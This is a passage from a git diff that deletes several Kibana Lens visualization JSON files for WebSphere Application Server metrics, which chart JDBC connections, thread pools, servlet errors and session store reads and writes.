"396f488f-0d3c-44c2-bd13-312d9db09222:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "396f488f-0d3c-44c2-bd13-312d9db09222:indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "396f488f-0d3c-44c2-bd13-312d9db09222:10b45b12-77b4-4241-a864-55c5b313cd40", + "id": "metrics-*" + } + ], + "migrationVersion": { + "dashboard": "8.3.0" + }, + "coreMigrationVersion": "8.3.0" } \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9.json deleted file mode 100644 index 0ef67642c19..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9.json +++ /dev/null @@ -1,172 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "79027b05-459f-4773-823b-238f4e0b907a": { - "columnOrder": [ - "407e0b68-66ae-43db-a9e3-86e632694e6b", - "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee", - "a6370094-15b2-4777-ac22-fe0612a6d34f", - "1dc49faf-ed90-489c-94cc-b145a28cba19" - ], - "columns": { - "1dc49faf-ed90-489c-94cc-b145a28cba19": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Persistent Stores Data Read", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.persistent_stores.data_read" - }, - "407e0b68-66ae-43db-a9e3-86e632694e6b": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.session_manager.app_name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "1dc49faf-ed90-489c-94cc-b145a28cba19", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.session_manager.app_name" - }, - "a6370094-15b2-4777-ac22-fe0612a6d34f": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Persistent Stores Data Written", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.persistent_stores.data_written" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "a6370094-15b2-4777-ac22-fe0612a6d34f", - "1dc49faf-ed90-489c-94cc-b145a28cba19" - ], - "layerId": "79027b05-459f-4773-823b-238f4e0b907a", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee", - "xAccessor": "407e0b68-66ae-43db-a9e3-86e632694e6b", - "yConfig": [ - { - "color": "#087dea", - "forAccessor": "a6370094-15b2-4777-ac22-fe0612a6d34f" - }, - { - "color": "#60c06d", - "forAccessor": "1dc49faf-ed90-489c-94cc-b145a28cba19" - } - ] - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Count" - } - }, - "title": "Persistent Store Data Read and Written [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-79027b05-459f-4773-823b-238f4e0b907a", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1.json deleted file mode 100644 index b2e4f8ff282..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1.json +++ /dev/null @@ -1,141 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5cb0751e-cee8-41d7-a221-1c89264c3c7e": { - "columnOrder": [ - "acf862f8-f0e1-482c-a70d-1599b559ba14", - "005f5de3-8a9a-4e48-8f85-293f2a8b283a", - "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9" - ], - "columns": { - "005f5de3-8a9a-4e48-8f85-293f2a8b283a": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.jdbc.data_source", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.jdbc.data_source" - }, - "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.total.operations_calls: *" - }, - "isBucketed": false, - "label": "Total operations calls", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.total.operations_calls" - }, - "acf862f8-f0e1-482c-a70d-1599b559ba14": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.total.operations_calls \u003e 0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9" - ], - "layerId": "5cb0751e-cee8-41d7-a221-1c89264c3c7e", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "005f5de3-8a9a-4e48-8f85-293f2a8b283a", - "xAccessor": "acf862f8-f0e1-482c-a70d-1599b559ba14" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Number of Operation Calls [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5cb0751e-cee8-41d7-a221-1c89264c3c7e", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd.json deleted file mode 100644 index 1cbf4272bea..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "39707dfa-c5ec-473f-8d7f-43c96a9beaef": { - "columnOrder": [ - "17f33a89-5e4f-4b62-a12e-ea9870e908ac" - ], - "columns": { - "17f33a89-5e4f-4b62-a12e-ea9870e908ac": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Errors", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.errors" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.servlet.errors : * " - }, - "visualization": { - "accessor": "17f33a89-5e4f-4b62-a12e-ea9870e908ac", - "layerId": "39707dfa-c5ec-473f-8d7f-43c96a9beaef", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Number of Errors [Metrics WebSphere Application Server]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-39707dfa-c5ec-473f-8d7f-43c96a9beaef", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1.json deleted file mode 100644 index bdc9ebc7ee5..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1.json +++ /dev/null @@ -1,196 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "6a787cb2-6500-4f46-bcc0-56ba379b2ec1": { - "columnOrder": [ - "6e346b5c-b6b3-4e66-ad29-3621b6165b6c", - "9c631c61-9a76-4650-90fe-b481257c028e", - "25cdb2ff-2d42-4703-9419-2375ef16c439", - "00acb34f-ae34-439a-9cb7-45a09bb69e15", - "03351030-51ad-4c19-9e9e-9a550b2e23e4", - "e7bed513-0fe1-460d-affc-4186777ff41a" - ], - "columns": { - "00acb34f-ae34-439a-9cb7-45a09bb69e15": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.closed: *" - }, - "isBucketed": false, - "label": "Closed Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.closed" - }, - "03351030-51ad-4c19-9e9e-9a550b2e23e4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.allocated: *" - }, - "isBucketed": false, - "label": "Allocated Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.allocated" - }, - "25cdb2ff-2d42-4703-9419-2375ef16c439": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.created: *" - }, - "isBucketed": false, - "label": "Created Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.created" - }, - "6e346b5c-b6b3-4e66-ad29-3621b6165b6c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "9c631c61-9a76-4650-90fe-b481257c028e": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.jdbc.data_source", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "03351030-51ad-4c19-9e9e-9a550b2e23e4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.jdbc.data_source" - }, - "e7bed513-0fe1-460d-affc-4186777ff41a": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.returned: *" - }, - "isBucketed": false, - "label": "Returned Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.returned" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.created \u003e 0 or websphere_application_server.jdbc.connection.closed \u003e 0 or websphere_application_server.jdbc.connection.allocated \u003e 0 or websphere_application_server.jdbc.connection.returned \u003e 0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "25cdb2ff-2d42-4703-9419-2375ef16c439", - "00acb34f-ae34-439a-9cb7-45a09bb69e15", - "03351030-51ad-4c19-9e9e-9a550b2e23e4", - "e7bed513-0fe1-460d-affc-4186777ff41a" - ], - "layerId": "6a787cb2-6500-4f46-bcc0-56ba379b2ec1", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "9c631c61-9a76-4650-90fe-b481257c028e", - "xAccessor": "6e346b5c-b6b3-4e66-ad29-3621b6165b6c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Count" - } - }, - "title": "Number of Created, Closed, Allocated and Returned Connections [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6a787cb2-6500-4f46-bcc0-56ba379b2ec1", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1.json deleted file mode 100644 index 87955f1810a..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1.json +++ /dev/null @@ -1,141 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "093d1982-684a-40db-bed9-9426559b90ee": { - "columnOrder": [ - "5df21f55-a6e2-439c-a15d-3d1d63f30b67", - "aaf7723c-6ca8-4015-864d-8263d7488d72", - "a2c8801f-9e82-4502-a4db-8290bf4b4b7e" - ], - "columns": { - "5df21f55-a6e2-439c-a15d-3d1d63f30b67": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "a2c8801f-9e82-4502-a4db-8290bf4b4b7e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.free: *" - }, - "isBucketed": false, - "label": "Free Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.free" - }, - "aaf7723c-6ca8-4015-864d-8263d7488d72": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.jdbc.data_source", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "a2c8801f-9e82-4502-a4db-8290bf4b4b7e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.jdbc.data_source" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "a2c8801f-9e82-4502-a4db-8290bf4b4b7e" - ], - "layerId": "093d1982-684a-40db-bed9-9426559b90ee", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "aaf7723c-6ca8-4015-864d-8263d7488d72", - "xAccessor": "5df21f55-a6e2-439c-a15d-3d1d63f30b67" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Number of Free Connections [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-093d1982-684a-40db-bed9-9426559b90ee", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04.json deleted file mode 100644 index 64882b5679f..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04.json +++ /dev/null @@ -1,142 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "c135b7c4-fd05-4a15-84d3-a959e24b077b": { - "columnOrder": [ - "a9009677-9999-4611-8f21-9a19fe50cda2", - "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd", - "91f4b685-d7b8-469f-b496-143f0f130cfe" - ], - "columns": { - "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "91f4b685-d7b8-469f-b496-143f0f130cfe", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "91f4b685-d7b8-469f-b496-143f0f130cfe": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.cleared: *" - }, - "isBucketed": false, - "label": "Cleared Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.cleared" - }, - "a9009677-9999-4611-8f21-9a19fe50cda2": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.cleared : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "91f4b685-d7b8-469f-b496-143f0f130cfe" - ], - "layerId": "c135b7c4-fd05-4a15-84d3-a959e24b077b", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd", - "xAccessor": "a9009677-9999-4611-8f21-9a19fe50cda2" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Number of Cleared Threads [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c135b7c4-fd05-4a15-84d3-a959e24b077b", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04.json deleted file mode 100644 index 5d48d3e5fd2..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04.json +++ /dev/null @@ -1,142 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5b4f04cc-fca5-4e2e-b12e-a08d6a89d693": { - "columnOrder": [ - "7a5b1405-0e12-4508-82c5-9ffa9ba35996", - "c4075f33-09c9-4c38-af7e-190f5b70398e", - "816bda95-3cd2-410e-b17c-8ba494196cf4" - ], - "columns": { - "7a5b1405-0e12-4508-82c5-9ffa9ba35996": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "816bda95-3cd2-410e-b17c-8ba494196cf4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.stopped.declared: *" - }, - "isBucketed": false, - "label": "Declared Stopped Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.stopped.declared" - }, - "c4075f33-09c9-4c38-af7e-190f5b70398e": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "816bda95-3cd2-410e-b17c-8ba494196cf4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.stopped.declared : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "816bda95-3cd2-410e-b17c-8ba494196cf4" - ], - "layerId": "5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "c4075f33-09c9-4c38-af7e-190f5b70398e", - "xAccessor": "7a5b1405-0e12-4508-82c5-9ffa9ba35996" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Declared Stopped Threads [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1.json deleted file mode 100644 index 6029eae8b57..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1.json +++ /dev/null @@ -1,141 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "f73c674c-32f9-437c-9556-c02eef1a0871": { - "columnOrder": [ - "c4abbc8f-c0f8-43de-aae9-ceeff9026807", - "880644a5-cf8e-4cd1-a607-0982600b03fa", - "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea" - ], - "columns": { - "880644a5-cf8e-4cd1-a607-0982600b03fa": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.jdbc.data_source", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.jdbc.data_source" - }, - "c4abbc8f-c0f8-43de-aae9-ceeff9026807": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.total.in_use: *" - }, - "isBucketed": false, - "label": "Total Connections In Use", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.total.in_use" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.total.in_use \u003e0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea" - ], - "layerId": "f73c674c-32f9-437c-9556-c02eef1a0871", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "880644a5-cf8e-4cd1-a607-0982600b03fa", - "xAccessor": "c4abbc8f-c0f8-43de-aae9-ceeff9026807" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Total Connections In Use [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f73c674c-32f9-437c-9556-c02eef1a0871", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04.json deleted file mode 100644 index aa1949c749b..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04.json +++ 